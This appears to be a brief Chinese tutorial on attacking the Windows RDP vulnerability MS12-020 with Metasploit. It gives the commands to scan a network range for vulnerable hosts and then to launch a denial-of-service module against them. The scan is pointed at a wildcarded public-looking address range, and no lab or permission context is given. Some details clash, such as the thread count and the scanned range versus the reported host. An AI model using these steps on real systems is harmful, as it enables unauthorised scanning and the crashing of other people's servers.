MS12-020漏洞利用

首先打开kali的命令提示符，输入msfconsole启动吧msf，接着输入search+漏洞编号来查看它的漏洞利用模块。这里一共有两个漏洞利用模块，一个是用来侦查目标网络是否存在漏洞主 机。一个是攻击模块。

打开命令终端输入msfconsole
输入 search ms12-020

首先利用第一个模块来对目标网段进行扫描。
输入 use auxiliary/scanner/rdp/ms12_020_check 进入漏洞利用模块
输入show option

这里需要设置RHOSTS（目标网段） THREADS（线程）。
那么输入 set RHOSTS 218.90.*.0/24 扫描目标网段。
接着 set THREADS 50 设置线程，我这里设置的线程是45.
然后输入 run 进行扫描。

接着他会对目标网段尽心扫描，速度还蛮快的。通过上图可以看到在192.168.75.128:3389这个地址后面的这一句The target is vulnerable，这句的意思是目标是脆弱的，那么说明这台主机存在这个漏洞。

接着我们需要用到另一个模块来对漏洞主机进行攻击。
输入 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 进入攻击模块。
接着依旧是输入 show options 查看需设置选项。

设置需要攻击的ip地址，输入run开始攻击